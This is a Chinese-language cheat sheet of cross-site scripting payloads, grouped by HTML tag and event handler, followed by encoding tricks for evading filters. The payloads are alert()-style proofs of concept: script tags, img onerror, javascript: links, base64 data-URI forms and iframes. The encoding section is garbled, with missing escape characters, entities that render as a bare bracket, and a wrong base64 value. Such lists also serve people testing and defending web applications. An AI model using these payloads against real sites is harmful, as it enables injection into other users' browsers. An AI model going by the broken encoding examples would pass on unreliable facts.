一、标准语句
代码语言:javascript复制<script>alert(/XSS/)</script>二、尝试大小写
代码语言:javascript复制<sCript>alert(1)</scRipt>三、使用<img>标签
代码语言:javascript复制1、windows事件
<img src="x" onerror=alert(1)>
<img src="1" onerror=eval("alert('xss')")>
//图片加载错误时触发
2、鼠标事件
<img src=1 onmouseover="alert(1)">
//鼠标指针移动到元素时触发
<img src=1 onmouseout="alert(1)">
//鼠标指针移出时触发四、使用<a>标签
代码语言:javascript复制1、使用href属性
<a href="https://www.qq.com">qq</a>
<a href=javascript:alert('xss')>test</a>
<a href="javascript:a" onmouseover="alert(/xss/)">aa</a>
<a href="" onclick=alert('xss')>a</a>
<a href="" onclick=eval(alert('xss'))>aa</a>
<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>五、使用<input>标签
代码语言:javascript复制<input name="name" value="">
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>
<input type="text" onkeydown="alert(1)">
//用户按下按键时触发
<input type="text" onkeypress="alert(1)">
//用户按下按键时触发
<input type="text" onkeyup="alert(1)">
//用户松开按键时触发六、使用<from>标签
代码语言:javascript复制<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')>
<form method=post action=aa.asp? onmouseover=prompt('xss')><form method=post action=aa.asp? onmouseover=alert('xss')><form action=1 onmouseover=alert('xss)>
<!--原code--><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">七、 使用<iframe>标签
代码语言:javascript复制<iframe src=javascript:alert('xss')></iframe>
<iframe src="data:text/html,<script>alert('xss')</script>"></iframe> <!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"> <!--base64编码--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> <iframe src="aaa" onmouseover=alert('xss') /><iframe> <iframe src="javascript:prompt(`xss`)"></iframe>八、 使用<svg>标签
代码语言:javascript复制<svg onload=alert(1)>九、 使用<body>标签
代码语言:javascript复制<body onload="alert(1)">
//加载时触发十、 使用<button>标签
代码语言:javascript复制<button onclick="alert(1)">text</button>
//元素上点击鼠标时触发
<p onmousedown="alert(1)">text</p>
//元素上按下鼠标时触发
<p onmouseup="alert(1)">text</p>
//在元素上释放鼠标时触发十一、 使用<p>标签
代码语言:javascript复制<p onmousedown="alert(1)">text</p>
//元素上按下鼠标时触发
<p onmouseup="alert(1)">text</p>
//在元素上释放鼠标时触发十二、XSS编码绕过
代码语言:javascript复制1、html实体编码(10进制与16进制):
如把尖括号编码[ < ] -----> html十进制: < html十六进制:<
2、javascript的八进制跟十六进制:
如把尖括号编码[ < ] -----> js八进制:74 js十六进制:x3c
三个八进制数字,如果数字不够,在前面补零,如a的编码为141
两个十六进制数字,如果数字不够,在前面补零,如a的编码为x61
四个十六进制数字,如果数字不够,在前面补零,如a的编码为u0061
对于一些控制字符,使用特殊的C类型的转义风格,如n和r
3、url编码:
如把尖括号编码[ < ] -----> url: "
4、base64编码:
如把尖括号编码[ < ] -----> base64: Ig==
5、jsunicode编码:
如把尖括号编码[ < ] ----->jsunicode:u003c
6、String.fromCharCode编码
如alert的编码为String.fromCharCode(97,108,101,114,116)推荐阅读:
XSS及绕过方式
https://github.com/lijiahaoGithub/xss/blob/master/xss.docx
作者:EI作者博客:EI_'s Blog
本文由公众号HACK学习排版编辑整理
